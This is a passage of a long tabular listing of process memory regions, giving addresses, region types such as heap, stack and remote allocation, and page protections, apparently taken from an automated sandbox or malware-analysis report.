page read and write
|
||
92F000
|
stack
|
page read and write
|
||
6188000
|
heap
|
page read and write
|
||
21E2000
|
heap
|
page read and write
|
||
6090000
|
heap
|
page read and write
|
||
895F000
|
stack
|
page read and write
|
||
7DF000
|
stack
|
page read and write
|
||
222E000
|
heap
|
page read and write
|
||
7EA0000
|
trusted library allocation
|
page read and write
|
||
26A0000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
21EE000
|
heap
|
page read and write
|
||
21EE000
|
heap
|
page read and write
|
||
440000
|
unkown
|
page readonly
|
||
401000
|
unkown
|
page execute read
|
||
21DCF000
|
stack
|
page read and write
|
||
2250F000
|
stack
|
page read and write
|
||
21E1000
|
heap
|
page read and write
|
||
624000
|
heap
|
page read and write
|
||
1BFC14DD000
|
heap
|
page read and write
|
||
545000
|
heap
|
page read and write
|
||
79DE000
|
stack
|
page read and write
|
||
473000
|
system
|
page execute and read and write
|
||
630000
|
heap
|
page read and write
|
||
616E000
|
heap
|
page read and write
|
||
1BFBC71A000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
7E70000
|
trusted library allocation
|
page read and write
|
||
1BFC12D0000
|
trusted library allocation
|
page read and write
|
||
221E000
|
heap
|
page read and write
|
||
6187000
|
heap
|
page read and write
|
||
45D000
|
system
|
page execute and read and write
|
||
2239000
|
heap
|
page read and write
|
||
22B2D000
|
unclassified section
|
page execute and read and write
|
||
21E6000
|
heap
|
page read and write
|
||
26D0000
|
heap
|
page read and write
|
||
22BC6000
|
unclassified section
|
page execute and read and write
|
||
470000
|
heap
|
page read and write
|
||
6187000
|
heap
|
page read and write
|
||
21B0000
|
heap
|
page read and write
|
||
21E5000
|
heap
|
page read and write
|
||
618D000
|
heap
|
page read and write
|
||
1BFBBE8D000
|
heap
|
page read and write
|
||
21E5000
|
heap
|
page read and write
|
||
21F4000
|
heap
|
page read and write
|
||
21F1000
|
heap
|
page read and write
|
||
68C000
|
heap
|
page read and write
|
||
1BFBCCE0000
|
trusted library section
|
page readonly
|
||
94D000
|
heap
|
page read and write
|
||
2235000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
1BFBBE92000
|
heap
|
page read and write
|
||
221A000
|
heap
|
page read and write
|
||
7C40000
|
trusted library allocation
|
page read and write
|
||
1BFBBEA2000
|
heap
|
page read and write
|
||
99E000
|
stack
|
page read and write
|
||
6420000
|
direct allocation
|
page read and write
|
||
21F1000
|
heap
|
page read and write
|
||
7C30000
|
trusted library allocation
|
page execute and read and write
|
||
7DE0000
|
trusted library allocation
|
page read and write
|
||
21FC000
|
heap
|
page read and write
|
||
2CDE000
|
heap
|
page read and write
|
||
29CF000
|
stack
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
2236000
|
heap
|
page read and write
|
||
550000
|
heap
|
page read and write
|
||
21F9000
|
heap
|
page read and write
|
||
550000
|
heap
|
page read and write
|
||
2233000
|
heap
|
page read and write
|
||
21EE000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
25E1000
|
heap
|
page read and write
|
||
16C0000
|
remote allocation
|
page execute and read and write
|
||
22D19000
|
heap
|
page read and write
|
||
1BFC142C000
|
heap
|
page read and write
|
||
18F000
|
stack
|
page read and write
|
||
343E000
|
stack
|
page read and write
|
||
545000
|
heap
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
21F1000
|
heap
|
page read and write
|
||
5BE000
|
stack
|
page read and write
|
||
5420000
|
heap
|
page execute and read and write
|
||
2DBF000
|
heap
|
page read and write
|
||
1BFBBE13000
|
heap
|
page read and write
|
||
2ABD000
|
stack
|
page read and write
|
||
74D0000
|
direct allocation
|
page read and write
|
||
A47000
|
heap
|
page read and write
|
||
8C7E000
|
heap
|
page read and write
|
||
B4026FB000
|
stack
|
page read and write
|
||
4F5000
|
heap
|
page read and write
|
||
B401D7E000
|
stack
|
page read and write
|
||
B401B7E000
|
stack
|
page read and write
|
||
220F000
|
heap
|
page read and write
|
||
2E1F000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
1BFC1400000
|
heap
|
page read and write
|
||
5E95000
|
heap
|
page read and write
|
||
560000
|
heap
|
page read and write
|
||
2226000
|
heap
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
222E000
|
heap
|
page read and write
|
||
3619000
|
trusted library allocation
|
page read and write
|
||
21D0000
|
heap
|
page read and write
|
||
6187000
|
heap
|
page read and write
|
||
21F1000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
B400C7F000
|
stack
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
544000
|
heap
|
page read and write
|
||
21D0000
|
heap
|
page read and write
|
||
26EF000
|
stack
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
21F1000
|
heap
|
page read and write
|
||
624000
|
heap
|
page read and write
|
||
21F3000
|
heap
|
page read and write
|
||
A0A000
|
heap
|
page read and write
|
||
21DC000
|
heap
|
page read and write
|
||
8CA6000
|
heap
|
page read and write
|
||
351E000
|
heap
|
page read and write
|
||
611B000
|
heap
|
page read and write
|
||
2219000
|
heap
|
page read and write
|
||
545000
|
heap
|
page read and write
|
||
22C20000
|
direct allocation
|
page read and write
|
||
4F4000
|
heap
|
page read and write
|
||
88B0000
|
trusted library allocation
|
page read and write
|
||
6183000
|
heap
|
page read and write
|
||
4F4000
|
heap
|
page read and write
|
||
1BFC1505000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
4F4000
|
heap
|
page read and write
|
||
6187000
|
heap
|
page read and write
|
||
35E0000
|
trusted library section
|
page read and write
|
||
D376000
|
direct allocation
|
page execute and read and write
|
||
5C0000
|
heap
|
page read and write
|
||
1BFBC602000
|
heap
|
page read and write
|
||
7E00000
|
trusted library allocation
|
page read and write
|
||
21EE000
|
heap
|
page read and write
|
||
2CD0000
|
trusted library allocation
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
B30000
|
heap
|
page read and write
|
||
304F000
|
heap
|
page read and write
|
||
52E000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
624000
|
heap
|
page read and write
|
||
456000
|
system
|
page execute and read and write
|
||
B402D7E000
|
stack
|
page read and write
|
||
618D000
|
heap
|
page read and write
|
||
B4029FE000
|
unkown
|
page readonly
|
||
440000
|
unkown
|
page readonly
|
||
82E000
|
stack
|
page read and write
|
||
2233000
|
heap
|
page read and write
|
||
2CD0000
|
trusted library allocation
|
page read and write
|
||
1BFC14F4000
|
heap
|
page read and write
|
||
41B000
|
system
|
page execute and read and write
|
||
3690000
|
heap
|
page read and write
|
||
8BDC000
|
stack
|
page read and write
|
||
B50000
|
heap
|
page read and write
|
||
21DF000
|
heap
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
2236000
|
heap
|
page read and write
|
||
223E000
|
heap
|
page read and write
|
||
22A10000
|
unclassified section
|
page execute and read and write
|
||
2BD0000
|
trusted library allocation
|
page read and write
|
||
4F5000
|
heap
|
page read and write
|
||
21F9000
|
heap
|
page read and write
|
||
21FE000
|
heap
|
page read and write
|
||
21D1000
|
heap
|
page read and write
|
||
9E0000
|
heap
|
page read and write
|
||
545000
|
heap
|
page read and write
|
||
22CAE000
|
heap
|
page read and write
|
||
545000
|
heap
|
page read and write
|
||
A35000
|
heap
|
page read and write
|
||
22CAE000
|
heap
|
page read and write
|
||
4F20000
|
heap
|
page read and write
|
||
21DC000
|
heap
|
page read and write
|
||
624000
|
heap
|
page read and write
|
||
21DF000
|
heap
|
page read and write
|
||
222E000
|
heap
|
page read and write
|
||
17C000
|
stack
|
page read and write
|
||
4F4000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
222E000
|
heap
|
page read and write
|
||
21F5000
|
heap
|
page read and write
|
||
21D0000
|
heap
|
page read and write
|
||
89B0000
|
trusted library allocation
|
page read and write
|
||
22CE9000
|
heap
|
page read and write
|
||
3698000
|
heap
|
page read and write
|
||
222E000
|
heap
|
page read and write
|
||
52B0000
|
trusted library allocation
|
page read and write
|
||
95E000
|
stack
|
page read and write
|
||
33FE000
|
stack
|
page read and write
|
||
2275000
|
heap
|
page read and write
|
||
B402DFE000
|
unkown
|
page readonly
|
||
2219000
|
heap
|
page read and write
|
||
2227000
|
heap
|
page read and write
|
||
3650000
|
trusted library allocation
|
page read and write
|
||
4F5000
|
heap
|
page read and write
|
||
7B65000
|
heap
|
page read and write
|
||
19A000
|
stack
|
page read and write
|
||
7BBA000
|
heap
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
7AF0000
|
direct allocation
|
page read and write
|
||
34CE000
|
heap
|
page read and write
|
||
B4010FE000
|
stack
|
page read and write
|
||
2231000
|
heap
|
page read and write
|
||
2BD0000
|
heap
|
page read and write
|
||
6450000
|
direct allocation
|
page read and write
|
||
22D2A000
|
heap
|
page read and write
|
||
23A0000
|
heap
|
page read and write
|
||
500000
|
heap
|
page read and write
|
||
6120000
|
heap
|
page read and write
|
||
B400D7E000
|
stack
|
page read and write
|
||
1BFC148B000
|
heap
|
page read and write
|
||
34E0000
|
heap
|
page read and write
|
||
2236000
|
heap
|
page read and write
|
||
2231000
|
heap
|
page read and write
|
||
21EE000
|
heap
|
page read and write
|
||
1BFBCCD0000
|
trusted library section
|
page readonly
|
||
21E5000
|
heap
|
page read and write
|
||
7E50000
|
trusted library allocation
|
page read and write
|
||
3390000
|
direct allocation
|
page read and write
|
||
7AD0000
|
direct allocation
|
page read and write
|
||
3540000
|
direct allocation
|
page read and write
|
||
8970000
|
heap
|
page read and write
|
||
7D1E000
|
stack
|
page read and write
|
||
21D1000
|
heap
|
page read and write
|
||
21D1000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
1BFC1390000
|
trusted library allocation
|
page read and write
|
||
440000
|
unkown
|
page readonly
|
||
1BFBC801000
|
trusted library allocation
|
page read and write
|
||
2ECE000
|
heap
|
page read and write
|
||
177000
|
stack
|
page read and write
|
||
45D000
|
system
|
page execute and read and write
|
||
21F1000
|
heap
|
page read and write
|
||
27D0000
|
heap
|
page read and write
|
||
9C000
|
stack
|
page read and write
|
||
22CCF000
|
heap
|
page read and write
|
||
617D000
|
heap
|
page read and write
|
||
456000
|
system
|
page execute and read and write
|
||
26D1000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
33C0000
|
direct allocation
|
page read and write
|
||
4F5000
|
heap
|
page read and write
|
||
8980000
|
trusted library allocation
|
page execute and read and write
|
||
2204000
|
heap
|
page read and write
|
||
2CD7000
|
heap
|
page read and write
|
||
2211000
|
heap
|
page read and write
|
||
5D3000
|
heap
|
page read and write
|
||
22CCF000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
60E000
|
stack
|
page read and write
|
||
21F9000
|
heap
|
page read and write
|
||
1BFBBF13000
|
heap
|
page read and write
|
||
6185000
|
heap
|
page read and write
|
||
3290000
|
heap
|
page read and write
|
||
2210000
|
heap
|
page read and write
|
||
618E000
|
heap
|
page read and write
|
||
8890000
|
trusted library allocation
|
page execute and read and write
|
||
459000
|
system
|
page execute and read and write
|
||
21D1000
|
heap
|
page read and write
|
||
624000
|
heap
|
page read and write
|
||
8D01000
|
heap
|
page read and write
|
||
2229000
|
heap
|
page read and write
|
||
2231000
|
heap
|
page read and write
|
||
21DA000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
2229000
|
heap
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
27D1000
|
heap
|
page read and write
|
||
2226000
|
heap
|
page read and write
|
||
21EE000
|
heap
|
page read and write
|
||
530E000
|
stack
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
6440000
|
direct allocation
|
page read and write
|
||
540000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
6BF000
|
stack
|
page read and write
|
||
21C60000
|
direct allocation
|
page read and write
|
||
B40207E000
|
stack
|
page read and write
|
||
222CB000
|
stack
|
page read and write
|
||
B4012FD000
|
stack
|
page read and write
|
||
6E0000
|
heap
|
page read and write
|
||
232E000
|
stack
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
19A000
|
stack
|
page read and write
|
||
3480000
|
heap
|
page read and write
|
||
21EE000
|
heap
|
page read and write
|
||
B4023FE000
|
unkown
|
page readonly
|
||
624000
|
heap
|
page read and write
|
||
27D1000
|
heap
|
page read and write
|
||
21F1000
|
heap
|
page read and write
|
||
1BFBBE00000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
2231000
|
heap
|
page read and write
|
||
21D9000
|
heap
|
page read and write
|
||
222E000
|
heap
|
page read and write
|
||
1BFC12C0000
|
trusted library allocation
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
222E000
|
heap
|
page read and write
|
||
1BFBBDE0000
|
heap
|
page read and write
|
||
C976000
|
direct allocation
|
page execute and read and write
|
||
21D1000
|
heap
|
page read and write
|
||
1BFC14EC000
|
heap
|
page read and write
|
||
2279F000
|
heap
|
page read and write
|
||
1BFC1660000
|
remote allocation
|
page read and write
|
||
920000
|
trusted library allocation
|
page read and write
|
||
2531000
|
heap
|
page read and write
|
||
65DD000
|
trusted library allocation
|
page read and write
|
||
25F5000
|
heap
|
page read and write
|
||
B4025FE000
|
unkown
|
page readonly
|
||
2249000
|
heap
|
page read and write
|
||
6188000
|
heap
|
page read and write
|
||
3603000
|
trusted library allocation
|
page execute and read and write
|
||
92F000
|
stack
|
page read and write
|
||
430000
|
unkown
|
page read and write
|
||
8AD0000
|
trusted library allocation
|
page read and write
|
||
B576000
|
direct allocation
|
page execute and read and write
|
||
26D1000
|
heap
|
page read and write
|
||
54C000
|
heap
|
page read and write
|
||
21880000
|
heap
|
page read and write
|
||
3040000
|
heap
|
page read and write
|
||
B4022FE000
|
unkown
|
page readonly
|
||
2CCF000
|
stack
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
2220000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
21D8000
|
heap
|
page read and write
|
||
21FE000
|
heap
|
page read and write
|
||
4F4000
|
heap
|
page read and write
|
||
2258000
|
heap
|
page read and write
|
||
21F1000
|
heap
|
page read and write
|
||
2DA5000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
34CF000
|
stack
|
page read and write
|
||
2231000
|
heap
|
page read and write
|
||
21F1000
|
heap
|
page read and write
|
||
21EE000
|
heap
|
page read and write
|
||
7D9E000
|
stack
|
page read and write
|
||
2239000
|
heap
|
page read and write
|
||
325B000
|
heap
|
page read and write
|
||
21F5000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
21E0000
|
heap
|
page read and write
|
||
7E40000
|
trusted library allocation
|
page read and write
|
||
2211000
|
heap
|
page read and write
|
||
21D9000
|
heap
|
page read and write
|
||
A07000
|
heap
|
page read and write
|
||
19C000
|
stack
|
page read and write
|
||
22CB0000
|
heap
|
page read and write
|
||
34D1000
|
heap
|
page read and write
|
||
2211000
|
heap
|
page read and write
|
||
8E80000
|
trusted library allocation
|
page read and write
|
||
943000
|
heap
|
page read and write
|
||
2231000
|
heap
|
page read and write
|
||
3430000
|
heap
|
page read and write
|
||
B401AFE000
|
unkown
|
page readonly
|
||
2219000
|
heap
|
page read and write
|
||
21F1000
|
heap
|
page read and write
|
||
220E000
|
heap
|
page read and write
|
||
545000
|
heap
|
page read and write
|
||
21E0000
|
heap
|
page read and write
|
||
2198E000
|
stack
|
page read and write
|
||
35B0000
|
heap
|
page read and write
|
||
1BFC13F0000
|
trusted library allocation
|
page read and write
|
||
21D9000
|
heap
|
page read and write
|
||
2FDC000
|
stack
|
page read and write
|
||
21F3000
|
heap
|
page read and write
|
||
680000
|
heap
|
page read and write
|
||
21EE000
|
heap
|
page read and write
|
||
4F4000
|
heap
|
page read and write
|
||
2215000
|
heap
|
page read and write
|
||
45C000
|
system
|
page execute and read and write
|
||
6F0000
|
heap
|
page read and write
|
||
440000
|
unkown
|
page readonly
|
||
624000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
400000
|
unkown
|
page readonly
|
||
5C83000
|
trusted library allocation
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
65E3000
|
trusted library allocation
|
page read and write
|
||
A176000
|
direct allocation
|
page execute and read and write
|
||
2231000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
22CAD000
|
heap
|
page read and write
|
||
4F0000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
400000
|
system
|
page execute and read and write
|
||
21E5000
|
heap
|
page read and write
|
||
21F70000
|
remote allocation
|
page read and write
|
||
33F0000
|
direct allocation
|
page read and write
|
||
7AA0000
|
direct allocation
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
22EFC000
|
heap
|
page read and write
|
||
B4019FE000
|
unkown
|
page readonly
|
||
B401C7E000
|
stack
|
page read and write
|
||
21DC000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
1BFC1443000
|
heap
|
page read and write
|
||
22B29000
|
unclassified section
|
page execute and read and write
|
||
2ED7000
|
heap
|
page read and write
|
||
4CE000
|
stack
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
221E000
|
heap
|
page read and write
|
||
1BFC1610000
|
trusted library allocation
|
page read and write
|
||
22A66000
|
unclassified section
|
page execute and read and write
|
||
45C000
|
system
|
page execute and read and write
|
||
2BD0000
|
trusted library allocation
|
page read and write
|
||
1BFBBEB8000
|
heap
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
440000
|
unkown
|
page readonly
|
||
B4020FE000
|
unkown
|
page readonly
|
||
345D000
|
heap
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
4D0000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
8A20000
|
trusted library allocation
|
page read and write
|
||
8C70000
|
heap
|
page read and write
|
||
21F4000
|
heap
|
page read and write
|
||
7BED000
|
heap
|
page read and write
|
||
21F1000
|
heap
|
page read and write
|
||
1BFC1230000
|
trusted library allocation
|
page read and write
|
||
1BFC12D0000
|
trusted library allocation
|
page read and write
|
||
5431000
|
trusted library allocation
|
page read and write
|
||
2C7D000
|
heap
|
page read and write
|
||
2BD0000
|
trusted library allocation
|
page read and write
|
||
41B000
|
system
|
page execute and read and write
|
||
2236000
|
heap
|
page read and write
|
||
430000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
2235000
|
heap
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
72F000
|
stack
|
page read and write
|
||
A09000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
21EE000
|
heap
|
page read and write
|
||
B4016F9000
|
stack
|
page read and write
|
||
9CE000
|
stack
|
page read and write
|
||
2EF0000
|
heap
|
page read and write
|
||
1BFC1455000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
2218000
|
heap
|
page read and write
|
||
640000
|
heap
|
page read and write
|
||
480000
|
heap
|
page read and write
|
||
22FC0000
|
heap
|
page read and write
|
||
5406000
|
remote allocation
|
page execute and read and write
|
||
21FF0000
|
heap
|
page read and write
|
||
21DF000
|
heap
|
page read and write
|
||
6139000
|
heap
|
page read and write
|
||
2231000
|
heap
|
page read and write
|
||
2BD9000
|
heap
|
page read and write
|
||
A49000
|
heap
|
page read and write
|
||
22D0B000
|
heap
|
page read and write
|
||
21F1D000
|
stack
|
page read and write
|
||
1BFC1300000
|
trusted library allocation
|
page read and write
|
||
362A000
|
trusted library allocation
|
page execute and read and write
|
||
7C90000
|
trusted library allocation
|
page read and write
|
||
1806000
|
remote allocation
|
page execute and read and write
|
||
222A000
|
heap
|
page read and write
|
||
618B000
|
heap
|
page read and write
|
||
2219000
|
heap
|
page read and write
|
||
1BFC150E000
|
heap
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
2211000
|
heap
|
page read and write
|
||
33E0000
|
direct allocation
|
page read and write
|
||
94D000
|
heap
|
page read and write
|
||
624000
|
heap
|
page read and write
|
||
22E83000
|
heap
|
page read and write
|
||
1BFC12F0000
|
trusted library allocation
|
page read and write
|
||
1BFBBE90000
|
heap
|
page read and write
|
||
1BFBCCC0000
|
trusted library section
|
page readonly
|
||
504000
|
heap
|
page read and write
|
||
33B0000
|
direct allocation
|
page read and write
|
||
545000
|
heap
|
page read and write
|
||
2211000
|
heap
|
page read and write
|
||
480000
|
heap
|
page read and write
|
||
4F1C000
|
stack
|
page read and write
|
||
8A10000
|
trusted library allocation
|
page read and write
|
||
618B000
|
heap
|
page read and write
|
||
7C20000
|
trusted library allocation
|
page read and write
|
||
2220000
|
heap
|
page read and write
|
||
2227000
|
heap
|
page read and write
|
||
2211000
|
heap
|
page read and write
|
||
617E000
|
heap
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
545000
|
heap
|
page read and write
|
||
2264F000
|
stack
|
page read and write
|
||
1BFBBE7B000
|
heap
|
page read and write
|
||
8D33000
|
heap
|
page read and write
|
||
6189000
|
heap
|
page read and write
|
||
9D000
|
stack
|
page read and write
|
||
3680000
|
trusted library allocation
|
page execute and read and write
|
||
6188000
|
heap
|
page read and write
|
||
B4021FE000
|
stack
|
page read and write
|
||
26FE000
|
heap
|
page read and write
|
||
21E0000
|
heap
|
page read and write
|
||
35F0000
|
trusted library allocation
|
page read and write
|
||
8E90000
|
direct allocation
|
page execute and read and write
|
||
2235000
|
heap
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
3250000
|
heap
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
617E000
|
heap
|
page read and write
|
||
1BFC12F0000
|
trusted library allocation
|
page read and write
|
||
21E8000
|
heap
|
page read and write
|
||
222E000
|
heap
|
page read and write
|
||
21A8000
|
heap
|
page read and write
|
||
7670000
|
heap
|
page read and write
|
||
22BCC000
|
unclassified section
|
page execute and read and write
|
||
6080000
|
direct allocation
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
221E000
|
heap
|
page read and write
|
||
4F4000
|
heap
|
page read and write
|
||
1BFBC600000
|
heap
|
page read and write
|
||
22D29000
|
heap
|
page read and write
|
||
6183000
|
heap
|
page read and write
|
||
21E1D000
|
stack
|
page read and write
|
||
1BFC14FF000
|
heap
|
page read and write
|
||
2220000
|
heap
|
page read and write
|
||
22CE9000
|
heap
|
page read and write
|
||
459000
|
system
|
page execute and read and write
|
||
22CF7000
|
heap
|
page read and write
|
||
683000
|
heap
|
page read and write
|
||
1BFBC615000
|
heap
|
page read and write
|
||
2220000
|
heap
|
page read and write
|
||
4F4000
|
heap
|
page read and write
|
||
2F0E000
|
stack
|
page read and write
|
||
21E0000
|
heap
|
page read and write
|
||
21F3000
|
heap
|
page read and write
|
||
22CAE000
|
heap
|
page read and write
|
||
1BFC14E8000
|
heap
|
page read and write
|
||
2211000
|
heap
|
page read and write
|
||
1BFBC580000
|
trusted library section
|
page read and write
|
||
21D1000
|
heap
|
page read and write
|
||
22D90000
|
heap
|
page read and write
|
||
21D1000
|
heap
|
page read and write
|
||
21F1000
|
heap
|
page read and write
|
||
2231000
|
heap
|
page read and write
|
||
2220000
|
heap
|
page read and write
|
||
7CD0000
|
heap
|
page execute and read and write
|
||
2F3E000
|
stack
|
page read and write
|
||
1BFC1502000
|
heap
|
page read and write
|
||
4E7E000
|
stack
|
page read and write
|
||
21DF000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
21F1000
|
heap
|
page read and write
|
||
2275000
|
heap
|
page read and write
|
||
2231000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
7EEB000
|
stack
|
page read and write
|
||
980000
|
heap
|
page read and write
|
||
2ACF000
|
stack
|
page read and write
|
||
22B70000
|
unclassified section
|
page execute and read and write
|
||
440000
|
unkown
|
page readonly
|
||
960000
|
heap
|
page read and write
|
||
624000
|
heap
|
page read and write
|
||
2231000
|
heap
|
page read and write
|
||
7620000
|
heap
|
page execute and read and write
|
||
401000
|
unkown
|
page execute read
|
||
7BDE000
|
stack
|
page read and write
|
||
22A0000
|
heap
|
page read and write
|
||
1BFC14CD000
|
heap
|
page read and write
|
||
22840000
|
unclassified section
|
page execute and read and write
|
||
620000
|
trusted library allocation
|
page read and write
|
||
2231000
|
heap
|
page read and write
|
||
1BFBBE78000
|
heap
|
page read and write
|
||
5DB0000
|
heap
|
page read and write
|
||
2231000
|
heap
|
page read and write
|
||
21ED000
|
heap
|
page read and write
|
||
81E000
|
stack
|
page read and write
|
||
500000
|
heap
|
page read and write
|
||
1BFC148E000
|
heap
|
page read and write
|
||
4F4000
|
heap
|
page read and write
|
||
2278F000
|
stack
|
page read and write
|
||
2FEE000
|
heap
|
page read and write
|
||
2233000
|
heap
|
page read and write
|
||
2211000
|
heap
|
page read and write
|
||
3618000
|
heap
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
4F4000
|
heap
|
page read and write
|
||
221C000
|
heap
|
page read and write
|
||
8EB0000
|
trusted library allocation
|
page execute and read and write
|
||
220E000
|
heap
|
page read and write
|
||
616E000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
617E000
|
heap
|
page read and write
|
||
22C0B000
|
unclassified section
|
page execute and read and write
|
||
2CD0000
|
trusted library allocation
|
page read and write
|
||
6183000
|
heap
|
page read and write
|
||
B4027FE000
|
unkown
|
page readonly
|
||
400000
|
system
|
page execute and read and write
|
||
544000
|
heap
|
page read and write
|
||
21EE000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
222E000
|
heap
|
page read and write
|
||
1BFBCCA0000
|
trusted library section
|
page readonly
|
||
1BFBC702000
|
heap
|
page read and write
|
||
22CE0000
|
heap
|
page read and write
|
||
2229000
|
heap
|
page read and write
|
||
638000
|
heap
|
page read and write
|
||
4F27000
|
heap
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
2BD0000
|
trusted library allocation
|
page read and write
|
||
790000
|
heap
|
page read and write
|
||
221E000
|
heap
|
page read and write
|
||
1BFBCCB0000
|
trusted library section
|
page readonly
|
||
4F4000
|
heap
|
page read and write
|
||
22CE0000
|
heap
|
page read and write
|
||
1BFC1304000
|
trusted library allocation
|
page read and write
|
||
27D6000
|
heap
|
page read and write
|
||
21E5000
|
heap
|
page read and write
|
||
2BEE000
|
stack
|
page read and write
|
||
65E000
|
stack
|
page read and write
|
||
8C90000
|
heap
|
page read and write
|
||
2220000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
2BD0000
|
trusted library allocation
|
page read and write
|
||
545000
|
heap
|
page read and write
|
||
9630000
|
direct allocation
|
page execute and read and write
|
||
7AE0000
|
direct allocation
|
page read and write
|
||
21F5000
|
heap
|
page read and write
|
||
2210000
|
heap
|
page read and write
|
||
4EC8000
|
trusted library allocation
|
page read and write
|
||
1BFBCDE0000
|
trusted library allocation
|
page read and write
|
||
21F9000
|
heap
|
page read and write
|
||
544000
|
heap
|
page read and write
|
||
2ECF000
|
unkown
|
page read and write
|
||
7E10000
|
trusted library allocation
|
page read and write
|
||
7E90000
|
trusted library allocation
|
page read and write
|
||
2220000
|
heap
|
page read and write
|
||
1BFC1240000
|
trusted library allocation
|
page read and write
|
||
8960000
|
heap
|
page read and write
|
||
617E000
|
heap
|
page read and write
|
||
6431000
|
trusted library allocation
|
page read and write
|
||
612A000
|
heap
|
page read and write
|
||
26D1000
|
heap
|
page read and write
|
||
21D1000
|
heap
|
page read and write
|
||
3620000
|
trusted library allocation
|
page read and write
|
||
3503000
|
heap
|
page read and write
|
||
2BAE000
|
stack
|
page read and write
|
||
2CD0000
|
trusted library allocation
|
page read and write
|
||
534E000
|
stack
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
8EA0000
|
trusted library allocation
|
page read and write
|
||
21F1000
|
heap
|
page read and write
|
||
323D000
|
stack
|
page read and write
|
||
2AFD000
|
stack
|
page read and write
|
||
620000
|
heap
|
page read and write
|
||
21F9000
|
heap
|
page read and write
|
||
2231000
|
heap
|
page read and write
|
||
3560000
|
direct allocation
|
page read and write
|
||
A4A000
|
heap
|
page read and write
|
||
2222000
|
heap
|
page read and write
|
||
504000
|
heap
|
page read and write
|
||
22D58000
|
heap
|
page read and write
|
||
53CE000
|
stack
|
page read and write
|
||
89A0000
|
trusted library allocation
|
page read and write
|
||
1BFC14FD000
|
heap
|
page read and write
|
||
3632000
|
trusted library allocation
|
page read and write
|
||
2220000
|
heap
|
page read and write
|
||
8880000
|
heap
|
page read and write
|
||
538E000
|
stack
|
page read and write
|
||
21AEF000
|
stack
|
page read and write
|
||
545000
|
heap
|
page read and write
|
||
220A000
|
heap
|
page read and write
|
||
22BF0000
|
unclassified section
|
page execute and read and write
|
||
1BFBC700000
|
heap
|
page read and write
|
||
82F000
|
stack
|
page read and write
|
||
21F9000
|
heap
|
page read and write
|
||
435000
|
unkown
|
page read and write
|
||
25E1000
|
heap
|
page read and write
|
||
6480000
|
heap
|
page read and write
|
||
35D0000
|
trusted library section
|
page read and write
|
||
4F4000
|
heap
|
page read and write
|
||
22D8E000
|
heap
|
page read and write
|
||
21D8000
|
heap
|
page read and write
|
||
22CA0000
|
heap
|
page read and write
|
||
25E0000
|
heap
|
page read and write
|
||
2240C000
|
stack
|
page read and write
|
||
21EE000
|
heap
|
page read and write
|
||
2254D000
|
stack
|
page read and write
|
||
22A90000
|
unclassified section
|
page execute and read and write
|
||
553000
|
heap
|
